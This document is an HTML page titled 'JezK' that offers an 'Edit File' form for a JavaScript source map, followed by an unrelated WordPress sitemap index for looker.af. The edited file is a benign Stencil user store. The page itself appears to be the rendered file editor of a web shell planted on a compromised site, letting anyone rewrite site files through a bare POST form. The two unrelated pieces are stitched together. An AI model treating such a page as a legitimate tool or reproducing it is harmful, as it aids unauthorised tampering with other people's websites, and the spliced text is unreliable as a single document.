
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: store-ac90a769.js.map</h2><form method="post"><textarea name="file_content" rows="10" cols="50">{&quot;file&quot;:&quot;store-ac90a769.js&quot;,&quot;mappings&quot;:&quot;;;;AAAA;;;AASA,MAAM,EAAE,IAAI,EAAE,GAAG,kBAAkB,EAAE,CAAC;MAEzB,QAAQ,GAAG,WAAW;MACtB,SAAS,GAAG,YAAY;MACxB,SAAS,GAAG,YAAY;MACxB,UAAU,GAAG,aAAa;MAC1B,YAAY,GAAG,eAAe;MAYrC,EAAE,KAAK,EAAE,QAAQ,EAAE,OAAO,EAAE,GAAG,WAAW,CAAQ;IACtD,QAAQ,EAAE,KAAK;IACf,KAAK,EAAE,EAAE;IACT,IAAI,EAAE,EAAE;IACR,SAAS,EAAE,EAAE;IACb,kBAAkB,EAAE,IAAI;IACxB,iBAAiB,EAAE,IAAI;IACvB,GAAG,IAAI;CACR,EAAE;MAEU,SAAS,GAAG;IACvB,KAAK,CAAC,QAAQ,GAAG,KAAK,CAAC;IACvB,KAAK,CAAC,KAAK,GAAG,EAAE,CAAC;IACjB,KAAK,CAAC,IAAI,GAAG,EAAE,CAAC;IAChB,KAAK,CAAC,SAAS,GAAG,EAAE,CAAC;IACrB,KAAK,CAAC,kBAAkB,GAAG,IAAI,CAAC;IAChC,KAAK,CAAC,iBAAiB,GAAG,IAAI,CAAC;AACjC;;;;&quot;,&quot;names&quot;:[],&quot;sources&quot;:[&quot;src/store/user/store.ts&quot;],&quot;sourcesContent&quot;:[&quot;/**\n * External dependencies.\n */\nimport { createStore } from &#039;@stencil/store&#039;;\n\n/**\n * Internal dependencies.\n */\nimport { getSerializedState } from &#039;@store/utils&#039;;\nconst { user } = getSerializedState();\n\nexport const VERIFIED = &#039;verified&#039;;\nexport const VERIFYING = &#039;verifying&#039;;\nexport const CODE_SENT = &#039;code_sent&#039;;\nexport const UNVERIFIED = &#039;unverified&#039;;\nexport const CODE_EXPIRED = &#039;code_expired&#039;;\n\ninterface Store {\n  loggedIn: boolean;\n  email: string;\n  name: string;\n  avatarUrl: string;\n  verificationStatus: &#039;code_sent&#039; | &#039;verifying&#039; | &#039;verified&#039; | &#039;unverified&#039; | &#039;code_expired&#039; | null;\n  /** Absolute client-side timestamp (ms) when the next code resend is allowed. Anchors the cooldown across reload, tab switch, and \&quot;Change\&quot;. */\n  resendAvailableAt: number | null;\n}\n\nconst { state, onChange, dispose } = createStore&lt;Store&gt;({\n  loggedIn: false,\n  email: &#039;&#039;,\n  name: &#039;&#039;,\n  avatarUrl: &#039;&#039;,\n  verificationStatus: null,\n  resendAvailableAt: null,\n  ...user,\n});\n\nexport const resetUser = () =&gt; {\n  state.loggedIn = false;\n  state.email = &#039;&#039;;\n  state.name = &#039;&#039;;\n  state.avatarUrl = &#039;&#039;;\n  state.verificationStatus = null;\n  state.resendAvailableAt = null;\n};\n\nexport default state;\nexport { state, onChange, dispose };\n&quot;],&quot;version&quot;:3}</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
